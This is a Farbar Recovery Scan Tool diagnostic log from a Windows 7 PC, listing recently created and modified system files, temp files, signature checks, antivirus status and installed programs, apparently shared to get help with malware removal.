2014-10-15 13:53 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-15 13:53 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:52 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:52 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:52 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 13:52 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 13:52 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 13:52 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:52 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:52 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:52 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:52 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:52 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:52 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:52 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:52 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:52 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-15 13:52 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-15 13:52 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-15 13:52 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:52 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:52 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-15 13:52 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:52 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 13:52 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:52 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-15 13:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-15 13:52 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:51 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:51 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-05 10:00 - 2012-02-12 01:06 - 00000000 ____D () C:\ProgramData\MFAData
2014-11-05 09:43 - 2014-06-28 15:22 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-05 09:20 - 2011-11-26 19:42 - 01302857 _____ () C:\Windows\WindowsUpdate.log
2014-11-05 01:59 - 2013-07-10 12:18 - 00000000 ____D () C:\ProgramData\LogMeIn
2014-11-04 19:52 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 19:52 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 16:34 - 2012-08-08 23:01 - 00000000 ____D () C:\Users\Deborah\AppData\Local\CrashDumps
2014-11-04 16:02 - 2012-02-11 21:13 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-11-04 16:01 - 2012-02-11 21:13 - 00003498 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-11-04 16:01 - 2012-02-11 21:13 - 00003448 _____ () C:\Windows\System32\Tasks\PCDEventLauncher
2014-11-04 16:01 - 2012-02-11 21:13 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-11-03 20:05 - 2014-01-21 14:19 - 00001015 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk
2014-11-03 20:05 - 2014-01-21 14:19 - 00000999 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2014-11-03 20:04 - 2013-07-10 12:18 - 00000000 ____D () C:\Program Files (x86)\LogMeIn
2014-11-03 19:55 - 2013-07-10 12:19 - 00035688 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll
2014-11-03 19:55 - 2013-07-10 12:18 - 00107392 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll
2014-11-03 19:55 - 2013-07-10 12:18 - 00092520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll
2014-11-03 18:57 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-03 18:52 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-02 17:49 - 2012-02-11 21:11 - 00000000 ____D () C:\Users\Deborah
2014-10-31 05:03 - 2013-07-10 12:22 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-31 04:59 - 2011-11-26 20:04 - 00000000 ____D () C:\Program Files\Google
2014-10-31 04:59 - 2011-11-26 20:03 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-31 04:23 - 2012-02-11 21:25 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Google
2014-10-31 04:23 - 2011-11-26 20:04 - 00000000 ____D () C:\ProgramData\Google
2014-10-27 11:35 - 2014-06-28 15:22 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 09:54 - 2012-02-12 01:08 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 09:53 - 2014-03-31 08:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 09:53 - 2012-07-23 09:18 - 00000000 ___HD () C:\$AVG
2014-10-16 08:33 - 2009-07-13 23:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 03:10 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-16 02:33 - 2009-07-13 23:45 - 00455760 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:30 - 2014-05-07 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-16 02:07 - 2014-06-28 15:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:00 - 2012-02-11 22:10 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

Some content of TEMP:
====================
C:\Users\Deborah\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Deborah\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-05 00:37

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-05 10:41:15
Running from C:\Users\Deborah\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 2.00 - Lenovo)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.44 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5315 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5315 - AVG Technologies) Hidden
AVG Security Toolbar (HKLM-x32\...\AVG Secure Search) (Version: 18.1.9.799 - AVG Technologies)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.4.1.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: - Canon Inc.)
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version: - Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 3.15 - Piriform)
Citrix Presentation Server Client - Web Only (HKLM-x32\...\{E9459BCF-0982-498B-ABA7-26C34323493F}) (Version: 10.200.2650 - Citrix Systems, Inc.)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
D-Link DWA-125 (HKLM-x32\...\{E45CACFE-0576-4375-A84F-C34B99A7B652}) (Version: - D-Link)
EaseUS Todo Backup Free 4.0 (HKLM-x32\...\EaseUS Todo Backup Free 4.0_is1) (Version: 4.0.0.1 - CHENGDU YIWO Tech Development Co., Ltd)
Free PDF to Word Converter 5.1.0.383 (HKLM\...\Free PDF to Word Converter_is1) (Version: 5.1.0.383 - Smart Soft)
GoToAssist Customer 2.2.0.758 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.2.0.758 - Citrix Online)
HP Officejet 6500 E710a-f Basic Device Software (HKLM\...\{EC21DBC6-C760-463D-8866-BFACBB28A3E3}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710a-f Help (HKLM-x32\...\{037CD593-D760-4A00-B030-7BBAFA1123FE}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet 6500 E710n-z Basic Device Software (HKLM\...\{ADDF4B84-5D28-4EAE-8511-EF808C8BC81C}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710n-z Help (HKLM-x32\...\{130E5108-547F-4482-91EE-F45C784E08C7}) (Version: 140.0.2.2 - Hewlett Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1872 - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version: - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.5 - Intel)
Intel® Active Management Technology (HKLM\...\MESOL) (Version: - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Mouse Suite (HKLM\...\MouseSuite98) (Version: 6.45 - Lenovo)
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
LogMeIn (HKLM-x32\...\{CB7AF84A-1B7F-4C6B-8A58-EB7CDE48C23A}) (Version: 4.1.3268 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM\...\Office14.STANDARDR) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
PowerChute Personal Edition 3.0.2 (HKLM-x32\...\{8ED262EE-FC73-47A9-BB86-D92223246881}) (Version: 3.0.2 - Schneider Electric)
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SoundMAX (HKLM-x32\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.2.6595 - Analog Devices)
System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 4.01.0015 - Lenovo)
ThinkVantage Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 1.04.0023 - Lenovo Group Limited)
TotalMD 2011 SP2 (HKLM-x32\...\TotalMD For Networks_is1) (Version: - Dentimax, LLC)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
